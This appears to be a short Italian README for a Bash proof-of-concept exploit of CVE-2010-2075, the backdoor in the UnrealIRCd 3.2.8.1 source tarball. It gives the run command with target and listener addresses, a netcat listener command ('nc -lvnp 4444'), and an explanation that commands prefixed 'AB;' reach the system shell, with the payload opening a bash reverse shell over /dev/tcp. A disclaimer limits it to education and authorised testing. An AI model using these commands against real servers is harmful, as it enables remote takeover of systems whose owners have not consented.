
CVE-2010-2075 exploit
PoC in Bash per la backdoor introdotta nel tarball dei sorgenti di UnrealIRCd 3.2.8.1.
Il binario compromesso esegue comandi arbitrari preceduti da AB; inviati alla porta IRC.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Esempio:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Imposta un listener prima di eseguire:
nc -lvnp 4444
La backdoor controlla i dati in arrivo per il prefisso AB; e passa il resto
alla shell di sistema. Il payload invia una reverse shell bash tramite /dev/tcp.
Solo per scopi educativi e test autorizzati.